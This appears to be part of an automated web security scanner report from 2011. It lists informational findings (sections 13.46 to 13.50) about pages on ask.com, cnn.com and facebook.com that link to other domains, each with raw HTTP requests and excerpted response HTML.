<div id="di14"><img id="image14" src="http://media2.picsearch.com/is?XQOpo2C426iLjDrTT9AIM2NPyYfwVVaTOn4pdtsPakE" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di15"><img id="image15" src="http://media5.picsearch.com/is?IuLbB6oJs2yTgFH_ZCVFdKpeb9DRh8UheSsHYzVgu5I" border="0" hspace="0" vspace="0"


height="128" />
</div>
...[SNIP]...
<div id="di16"><img id="image16" src="http://media4.picsearch.com/is?khkNAgjOCGXoPhAOuorc2YrNiSLSVakyfH54dFChurQ" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...
<div id="di17"><img id="image17" src="http://media1.picsearch.com/is?FP_2ViFGwWgwQD-8wMaw9j0mTiEgLU28X2l1l0g4Jb4" border="0" hspace="0" vspace="0"

width="128"
/>
</div>
...[SNIP]...



<a href="http://www.google.com/aclk?sa=L&ai=CzJpc8GRJTsrqC4WVgge9j_mfBLaV7ST6xID-Fvf5hBkQASCJ9pACUOL2yP0GYMnW-obIo6AZyAEBqgQWT9BHlq7lswmvxNjnhvOb_If3s4WTMg&num=1&sig=AOD64_05ElYm_red2s5oYng2bkv6c3MlxA&adurl=http://www.aspectsecurity.com/training.html" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(36); if (typeof efclk != 'undefined') efclk(36); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'1',ex:'sgst%3D1%26sgcl%3D432arO-uQX2RB%252B%26sgch%3Dd077b8DZv3cpk-vKe5DadH%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style="display:block;padding:15px 20px 15px 15px;">



...[SNIP]...



<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" id="" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...



<a href="http://asksupport.custhelp.com/app/answers/list" id="" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

13.46. http://www.ask.com/web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkhQpcQDoAAAxvduAAAAL7
from-tr: trafrt010iad.io.askjeeves.info
Content-Length: 109507
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:25:09 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI1OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:25:09 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...
</a>


<a href="http://ask.pronto.com/user/search.do?&q=xss" class="txt3" style="color: #0055CC;">Shopping</a>
...[SNIP]...



<a href="http://www.askkids.com?o=0&l=dir"
class="txt3" style="color: #0055CC;">
Kids</a>
...[SNIP]...
<span><a class="title txt_lg b title" href="http://studio-5.financialcontent.com/ask/quote?Symbol=399:3613634" onmousedown="return pk(this,{en:'da',io:'0',b:'a001',tp:'41',ec:'3',ex:'da_sn%3D00090%26da_lhs%3D2012522%26da_lhx%3Dpra%253A%2Bstocks%253A%2Bstox%253A%2Bsimple_ask11%253A0%253A%2BFinCon%26da_rhs%3D2014016%26da_rht%3DLink%26da_rhx%3DDbxt%2BS%2526amp%253Bp%2B500%2BId%2B1cc%2B%2528XSS%2529%26da_sro%3D2014013%26da_stp%3D1%26da_iid%3D0001%26da_lit%3DDbxt%2BS%2526p%2B500%2BId%2B1cc%2B%2528XSS%2529%26da_origin%3Draw'});" target="_blank" ><span >
...[SNIP]...
<td style="padding-right:10px;">


<a href="http://studio-5.financialcontent.com/ask/quote?Symbol=XSS" onmousedown="return pk(this,{en:'stsa',io:'1',b:'a001',tp:'41',ec:'1',ex:'da_sn%3D00090%26da_lhs%3D2012522%26da_lhx%3Dpra%253A%2Bstocks%253A%2Bstox%253A%2Bsimple_ask11%253A0%253A%2BFinCon%26da_rhs%3D0%26da_rht%3DFragment%26da_rhx%3Dstox%26da_sro%3D2014013%26da_stp%3D1%26da_iid%3D0001%26da_lit%3DDbxt%2BS%2526p%2B500%2BId%2B1cc%2B%2528XSS%2529%26da_origin%3Draw'})"><img src="http://chart.financialcontent.com/Chart?width=200&vucolor=008000&bvcolor=FFFFFF&gmcolor=DDDDDD&ticker=399:3613634&gtcolor=FFCC00&bgcolor=null&fillshy=-2&gbcolor=FFFFFF&Client=ask&brcolor=999999&pvcolor=B50000&ibcolor=null&vdcolor=FF0000&volume=0&fillshx=2&fillalpha=50&fillshalpha=20&interval=1&height=100&lncolor=666666&arcolor=null&txcolor=444444&itcolor=666666&grcolor=DDDDDD&type=0&shcolor=BBBBBB&shwidth=2" border="0"/></a>
...[SNIP]...
<td colspan="2">
<a class="txt3 cached title" href="http://studio-5.financialcontent.com/ask/quote/news?Symbol=399:3613634&ChannelType=PRESSRELEASES">Company News</a>
&#183;
<a class="txt3 cached title" href="http://studio-5.financialcontent.com/ask/quote/profile?Symbol=399:3613634">Profile</a>
&#183;
<a class="txt3 cached title" href="http://studio-5.financialcontent.com/ask/quote?Symbol=399:3613634">Market Summary</a>
...[SNIP]...



<img src="http://4.afs.googleadservices.com/images/partners/CJiAyZD20aoCFcjb4Aod9gMlSQ/aj-cat.png" style="display:none;" height="1px" width="1px" alt=""/>


<span class="T7 fr tp info txt0">
...[SNIP]...



<a href="http://www.google.com/aclk?sa=L&ai=Cof4shWRJTtipD8i3gwf2h5TJBLaV7ST6xID-Fvf5hBkIABABIPv-gQMoAlDi9sj9BmDJ1vqGyKOgGcgBAaoEFk_QFtXCk1wXoCEwjcXz2v4hhc8TEII&sig=AOD64_2aKkjLfU8lPDwyq1QBm1x8wsdskg&adurl=http://www.aspectsecurity.com/training.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(62); if (typeof efclk != 'undefined') efclk(62); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=Cof4shWRJTtipD8i3gwf2h5TJBLaV7ST6xID-Fvf5hBkIABABIPv-gQMoAlDi9sj9BmDJ1vqGyKOgGcgBAaoEFk_QFtXCk1wXoCEwjcXz2v4hhc8TEII&sig=AOD64_2aKkjLfU8lPDwyq1QBm1x8wsdskg&adurl=http://www.aspectsecurity.com/training.html" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(62); if (typeof efclk != 'undefined') efclk(62); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...



<a href="http://www.google.com/aclk?sa=L&ai=C81AahWRJTtipD8i3gwf2h5TJBNqirwe6h5a5CISlo70CCAAQAiD7_oEDKAJQ79PPRWDJ1vqGyKOgGcgBAaoEFk_QFtXCk18XoHgxtnlv0Xzhb42syDc&sig=AOD64_1nu9xDLYhODjv9939ihFMg_Hwk2Q&adurl=http://www.peterblum.com/des/inputsecurity.aspx" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(65); if (typeof efclk != 'undefined') efclk(65); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_1');" class="nu" onmouseover="return ss('www.peterblum.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C81AahWRJTtipD8i3gwf2h5TJBNqirwe6h5a5CISlo70CCAAQAiD7_oEDKAJQ79PPRWDJ1vqGyKOgGcgBAaoEFk_QFtXCk18XoHgxtnlv0Xzhb42syDc&sig=AOD64_1nu9xDLYhODjv9939ihFMg_Hwk2Q&adurl=http://www.peterblum.com/des/inputsecurity.aspx" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(65); if (typeof efclk != 'undefined') efclk(65); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_1');" class="nu" onmouseover="return ss('www.peterblum.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
</b>) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side ...

<a href="http://en.wikipedia.org/wiki/Cross-site_scripting" onmousedown="return pk(this,{en:'vwki',io:'1',b:'a002',tp:'d',ec:'1',ex:'tsrc%3DRFE'})" class="L2 fcolor" style="white-space:nowrap" target="_blank">View article on Wikipedia &#187;</a>
...[SNIP]...
</b> may refer to: Cross-site scripting, a vulnerability in web applications ...

<a href="http://en.wikipedia.org/wiki/XSS" onmousedown="return pk(this,{en:'vwki',io:'2',b:'a003',tp:'d',ec:'1',ex:'tsrc%3DRFE'})" class="L2 fcolor" style="white-space:nowrap" target="_blank">View article on Wikipedia &#187;</a>
...[SNIP]...
<div class="pl10">
   
<a class="title txt3" onmousedown="return pk(this,{en:'ns',io:'0',b:'a004',tp:'d',ec:'1'})" target="_blank" href="http://c.moreover.com/click/here.pl?z5073683526&amp;amp;z=1250248829" onmouseover="return ss('http://www.linuxtoday.com/security/2011081500739OSSW')" onmouseout="cs()" ><b>
...[SNIP]...
<div id="r_t4">


<a id="r4_t" href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" onmousedown="return fp(this,{en:'te',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank"><b>
...[SNIP]...
<div id="r_t5">


<a id="r4_t" href="http://www.cgisecurity.com/xss-faq.html" onmousedown="return fp(this,{en:'te',io:'0',b:'a006',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank">The <b>
...[SNIP]...
<div id="r_t6">


<a id="r5_t" href="http://ha.ckers.org/xss.html" onmousedown="return fp(this,{en:'te',io:'0',b:'a007',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank"><b>
...[SNIP]...
<div id="r_t7">


<a id="r6_t" href="http://www.acunetix.com/websitesecurity/xss.htm" onmousedown="return fp(this,{en:'te',io:'0',b:'a008',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank"><b>
...[SNIP]...
<div id="r_t8">


<a id="r7_t" href="http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting" onmousedown="return fp(this,{en:'te',io:'0',b:'a009',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank">The Web Application Security Consortium / <b>
...[SNIP]...
<div id="r_t9">


<a id="r8_t" href="http://xss-proxy.sourceforge.net/" onmousedown="return fp(this,{en:'te',io:'0',b:'a010',tp:'d',ec:'1',ex:'tsrc%3Dtled'},'false',0)" class="title txt_lg" target="_blank"><b>
...[SNIP]...



<a href="http://www.google.com/aclk?sa=L&ai=Cof4shWRJTtipD8i3gwf2h5TJBLaV7ST6xID-Fvf5hBkIABABIPv-gQMoAlDi9sj9BmDJ1vqGyKOgGcgBAaoEFk_QFtXCk1wXoCEwjcXz2v4hhc8TEII&sig=AOD64_2aKkjLfU8lPDwyq1QBm1x8wsdskg&adurl=http://www.aspectsecurity.com/training.html&ba=1" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(81); if (typeof efclk != 'undefined') efclk(81); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=Cof4shWRJTtipD8i3gwf2h5TJBLaV7ST6xID-Fvf5hBkIABABIPv-gQMoAlDi9sj9BmDJ1vqGyKOgGcgBAaoEFk_QFtXCk1wXoCEwjcXz2v4hhc8TEII&sig=AOD64_2aKkjLfU8lPDwyq1QBm1x8wsdskg&adurl=http://www.aspectsecurity.com/training.html&ba=1" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(81); if (typeof efclk != 'undefined') efclk(81); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_0');" class="nu" onmouseover="return ss('www.aspectsecurity.com/training')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...



<a href="http://www.google.com/aclk?sa=L&ai=C81AahWRJTtipD8i3gwf2h5TJBNqirwe6h5a5CISlo70CCAAQAiD7_oEDKAJQ79PPRWDJ1vqGyKOgGcgBAaoEFk_QFtXCk18XoHgxtnlv0Xzhb42syDc&sig=AOD64_1nu9xDLYhODjv9939ihFMg_Hwk2Q&adurl=http://www.peterblum.com/des/inputsecurity.aspx&ba=1" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(90); if (typeof efclk != 'undefined') efclk(90); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_1');" class="nu" onmouseover="return ss('www.peterblum.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=C81AahWRJTtipD8i3gwf2h5TJBNqirwe6h5a5CISlo70CCAAQAiD7_oEDKAJQ79PPRWDJ1vqGyKOgGcgBAaoEFk_QFtXCk18XoHgxtnlv0Xzhb42syDc&sig=AOD64_1nu9xDLYhODjv9939ihFMg_Hwk2Q&adurl=http://www.peterblum.com/des/inputsecurity.aspx&ba=1" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(90); if (typeof efclk != 'undefined') efclk(90); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'2',ex:'sgst%3D1%26sgcl%3Dc5c6w1-%2525Xt%26sgch%3D027bXbJ0S3Nu6-IzDXg1bq%26sgmd%3D1'},'gg_1');" class="nu" onmouseover="return ss('www.peterblum.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...



<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" id="" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...



<a href="http://asksupport.custhelp.com/app/answers/list" id="" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

13.47. http://www.cnn.com/.element/ssi/misc/3.0/editionvars.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /.element/ssi/misc/3.0/editionvars.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /.element/ssi/misc/3.0/editionvars.html?&csiID=csi2 HTTP/1.1
Host: www.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; tnr:usrvtstg01=1313433954593%7C0%7C0%7C1%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C1%7Cf%7C1%7C7%7C1313433954593; tnr:sesctmp01=1313433954593; s_cc=true; s_sq=%5B%5BB%5D%5D; CG=US:--:--; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:08 GMT
Server: Apache
Set-Cookie: CG=US:--:--; path=/
Accept-Ranges: bytes
Cache-Control: max-age=60, private, private
Expires: Mon, 15 Aug 2011 18:45:13 GMT
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 9596
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script>
                       
...[SNIP]...
</script><script type="text/javascript" src="http://i.cdn.turner.com//cnn/.element/js/3.0/csi_include.js"></script>
...[SNIP]...

13.48. http://www.facebook.com/ConanTheBarbarian  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ConanTheBarbarian

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ConanTheBarbarian?sk=app_108503912579284 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; rdir=/login.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.43.49
X-Cnection: close
Date: Mon, 15 Aug 2011 18:24:20 GMT
Content-Length: 49693

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/mVJg8S3A2Rm.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/gvrW9GGxv2y.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/_ev5gLu-ABH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/foOlSPGxMgD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vIpx6O3T-P_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/gjR314n9JTe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/7phT2ydMzW6.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

13.49. http://www.facebook.com/media/set/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /media/set/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /media/set/?set=a.206519616063696.51681.146642365384755 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos; wd=1123x954; x-src=%2Fmedia%2Fset%2F%7Cpagelet_photo_albums; act=1313433588181%2F1; _e_mTli_0=%5B%22mTli%22%2C1313433588184%2C%22act%22%2C1313433588181%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755%22%2C%22click%22%2C%22click%22%2C%22photo_albums%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C328%2C584%2C63%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.237.31
X-Cnection: close
Date: Mon, 15 Aug 2011 18:38:52 GMT
Content-Length: 172809

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/media\/set\/index.php";window._EagleEyeSeed="QNCv";</scri
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/mVJg8S3A2Rm.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/gvrW9GGxv2y.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/_ev5gLu-ABH.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vIpx6O3T-P_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/gjR314n9JTe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/7phT2ydMzW6.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

13.50. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fcnnmoney&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=27 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
